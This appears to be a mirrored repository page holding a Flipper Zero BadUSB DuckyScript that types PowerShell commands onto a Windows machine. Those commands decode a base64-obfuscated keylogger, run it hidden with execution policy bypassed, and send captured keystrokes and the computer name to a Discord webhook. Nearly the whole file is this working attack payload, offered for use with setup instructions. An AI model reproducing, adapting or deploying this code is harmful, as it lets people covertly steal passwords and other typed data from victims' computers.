gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2026-01-06 01:37:21 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
ec3daeb41fa800d499f208a3e319f0f99728a01c
BadUSB-Files-For-FlipperZero/OSINT/Keylogger from base64 to Discord.txt
beigeworm 68bb026ba3 Update Keylogger from base64 to Discord.txt
2023-08-11 00:45:46 +01:00

30 lines
3.1 KiB
Plaintext
Raw Blame History

REM Title: Keylogger from base64 to Discord
REM Author: @beigeworm
REM Description: Uses Powershell to gather keystroke info and send it via Discord.
REM Target: Windows 10
REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys
REM *SETUP*
REM replace WEBHOOK_GOES_HERE with your discord webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM Open Powershell and start logs.
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 5000
STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
ENTER
STRING $b64 = 'JGEgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvLCBFeGFjdFNwZWxsaW5nPXRydWUpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBzaG9ydCBHZXRBc3luY0tleVN0YXRlKGludCB2aXJ0dWFsS2V5Q29kZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRLZXlib2FyZFN0YXRlKGJ5dGVbXSBrZXlzdGF0ZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBNYXBWaXJ0dWFsS2V5KHVpbnQgdUNvZGUsIGludCB1TWFwVHlwZSk7IFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBUb1VuaWNvZGUodWludCB3VmlydEtleSwgdWludCB3U2NhbkNvZGUsIGJ5dGVbXSBscGtleXN0YXRlLCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyIHB3c3pCdWZmLCBpbnQgY2NoQnVmZiwgdWludCB3RmxhZ3MpOyc7JGEgPSBBZGQtVHlwZSAtTWVtYmVyRGVmaW5pdGlvbiAkYSAtTmFtZSAnV2luMzInIC1OYW1lc3BhY2UgQVBJIC1QYXNzVGhydTskYiA9IFtTeXN0ZW0uRGlhZ25vc3RpY3MuU3RvcHdhdGNoXTo6U3RhcnROZXcoKTskYyA9IFtUaW1lU3Bhbl06OkZyb21TZWNvbmRzKDEwKTtXaGlsZSgkdHJ1ZSl7JGQgPSAkZmFsc2U7dHJ5e3doaWxlICgkYi5FbGFwc2VkIC1sdCAkYyl7U2xlZXAgLU1pbGxpc2Vjb25kcyAzMDtmb3IoJGUgPSA4OyAkZSAtbGUgMjU0OyAkZSsrKXskZiA9ICRhOjpHZXRBc3luY0tleVN0YXRlKCRlKTtpZiAoJGYgLWVxIC0zMjc2Nyl7JGQgPSAkdHJ1ZTskYi5SZXN0YXJ0KCk7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyRnID0gJGE6Ok1hcFZpcnR1YWxLZXkoJGUsIDMpOyRoID0gTmV3LU9iamVjdCBCeXRlW10gMjU2OyRqID0gJGE6OkdldEtleWJvYXJkU3RhdGUoJGgpOyRrID0gTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcjtpZigkYTo6VG9Vbmljb2RlKCRlLCAkZywgJGgsICRrLCAkay5DYXBhY2l0eSwgMCkpezskbCA9ICRrLlRvU3RyaW5nKCk7aWYgKCRlIC1lcSA4KSB7JGwgPSAiW0JLU1BdIn07aWYgKCRlIC1lcSAxMykgeyRsID0gIltFTlRdIn07aWYgKCRlIC1lcSAyNykgeyRsID0gIltFU0NdIn07JG0gKz0gJGx9fX19fWZpbmFsbHl7SWYoJGQpeyRuID0gJG0gLXJlcGxhY2UgJ1smPD5dJywgeyRhcmdzWzBdLlZhbHVlLlJlcGxhY2UoJyYnLCAnJmFtcDsnKS5SZXBsYWNlKCc8JywgJyZsdDsnKS5SZXBsYWNlKCc+JywgJyZndDsnKX07JG8gPSBHZXQtRGF0ZSAtRm9ybWF0ICJkZC1NTS15eXl5IEhIOm1tOnNzIjskcCA9ICRvKyIgOiAiKydgJyskbisnYCc7JHEgPSBAeyJ1c2VybmFtZSIgPSAiJGVudjpDT01QVVRFUk5BTUUiIDsiY29udGVudCIgPSAkcH0gfCBDb252ZXJ0VG8tSnNvbjtpcm0gLVVyaSAkZGMgLU1ldGhvZCBQb3N0IC1Db250ZW50VHlwZSAiYXBwbGljYXRpb24vanNvbiIgLUJvZHkgJHE7JGQgPSAkZmFsc2U7JG0gPSAiIn19JGIuUmVzdGFydCgpO1NsZWVwIC1NaWxsaXNlY29uZHMgMTB9'
ENTER
STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append
ENTER
STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force;exit
ENTER
Reference in New Issue View Git Blame Copy Permalink